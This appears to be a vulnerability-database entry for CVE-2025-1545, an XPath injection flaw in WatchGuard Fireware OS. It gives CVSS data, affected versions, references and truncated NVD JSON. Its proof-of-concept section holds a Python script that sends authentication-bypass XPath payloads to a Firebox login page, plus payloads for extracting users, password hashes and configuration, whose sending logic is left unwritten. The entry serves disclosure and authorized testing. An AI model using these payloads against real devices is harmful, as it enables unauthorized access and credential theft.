CVE-2025-1545

Description

An XPath Injection vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to retrieve sensitive information from the Firebox configuration through an exposed authentication or management web interface. This vulnerability only affects Firebox systems that have at least one authentication hotspot configured.This issue affects Fireware OS 11.11 up to and including 11.12.4+541730, 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:watchguard:firebox_t115-w:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t125:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t125-w:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t145:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t145-w:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:watchguard:firebox_m270:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_m290:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_m370:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_m390:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_m440:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:watchguard:firebox_t15:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:watchguard:firebox_t35:-:*:*:*:*:*:*:* - NOT VULNERABLE

Fireware OS 11.11 至 11.12.4+541730

Fireware OS 12.0 至 12.11.4

Fireware OS 12.5 至 12.5.13

Fireware OS 2025.1 至 2025.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-1545 XPath Injection PoC (Educational Purpose Only)
# Target: WatchGuard Firebox Authentication Hotspot
# Note: This is a conceptual PoC for authorized security testing only

import requests
import urllib3
urllib3.disable_warnings()

TARGET_URL = "https://<firebox-ip>/auth/login.html"

# XPath Injection payloads for testing
PAYLOADS = [
    "admin' or '1'='1",
    "' or '1'='1' or 'a'='a",
    "admin' or count(/*) > 0 or 'x'='y",
    "' or string-length(name(.)) > 0 or 'x'='y"
]

def test_xpath_injection():
    """
    Test for XPath injection vulnerability in WatchGuard Firebox
    The vulnerability exists in authentication hotspot interface
    """
    for payload in PAYLOADS:
        data = {
            'username': payload,
            'password': 'any_password',
            'submit': 'Login'
        }
        try:
            response = requests.post(TARGET_URL, data=data, verify=False, timeout=10)
            # Analyze response for signs of successful injection
            # - Different error messages
            # - Successful authentication
            # - Information disclosure
            print(f"Payload: {payload}")
            print(f"Status: {response.status_code}")
            print(f"Response Length: {len(response.text)}")
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")

def extract_config_info():
    """
    Extract sensitive configuration using XPath injection
    """
    # Extract user list
    username_payload = "' or //user[1]/name or 'x'='y"
    # Extract password hashes
    password_payload = "' or //user[1]/password or 'x'='y"
    # Extract configuration
    config_payload = "' or //config/* or 'x'='y"
    
    print("Extracting configuration data...")
    # Implementation would send crafted requests
    # and parse responses for sensitive information

if __name__ == "__main__":
    print("CVE-2025-1545 XPath Injection Test Tool")
    print("Use only on systems you have permission to test")
    test_xpath_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-1545
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-1545
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-1545/
[4] VulDB https://vuldb.com/cve/CVE-2025-1545
[5] https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00025

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-1545", "sourceIdentifier": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "published": "2025-12-04T22:15:48.290", "lastModified": "2025-12-10T16:05:35.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An XPath Injection vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to retrieve sensitive information from the Firebox configuration through an exposed authentication or management web interface. This vulnerability only affects Firebox systems that have at least one authentication hotspot configured.This issue affects Fireware OS 11.11 up to and including 11.12.4+541730, 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2."}], "metrics": {"cvssMetricV40": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-91"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.1", "versionEndExcluding": "2025.1.3", "matchCriteriaId": "46DAB795-8DD0-4D6C-99D5-B9057E76DB87"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t115-w:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8AAE66B-DD19-4C90-8DFC-F77BA1541642"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t125:-:*:*:*:*:*:*:*", "matchCriteriaId": "7FC18430-C6B4-4395-BFF1-83BB005875BA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t125-w:-:*:*:*:*:*:*:*", "matchCriteriaId": "1A7C1C91-8B6E-4FB0-841E-7F88B06B1435"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t145:-:*:*:*:*:*:*:*", "matchCriteriaId": "8FE309D6-BD5E-4D18-91C3-A492C3576115"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t145-w:-:*:*:*:*:*:*:*", "matchCriteriaId": "75959D39-0960-4836-96C7-DB8048DDE4B8"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_t185:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0087049-27C6-4B18-A645-72A8F63D7C6D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.11", "versionEndExcluding": "12.11.5", "matchCriteriaId": "8BDAB257-D4A3-4154-860B-89389F624C9B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m270:-:*:*:*:*:*:*:*", "matchCriteriaId": "E472917E-D6E1-4C2D-B37D-E76FCC7307CA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m290:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A8C7779-4466-4A9E-B191-929E7746DFF7"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m370:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CE9A123-B769-4E56-845E-DC3DA6166C ... (truncated)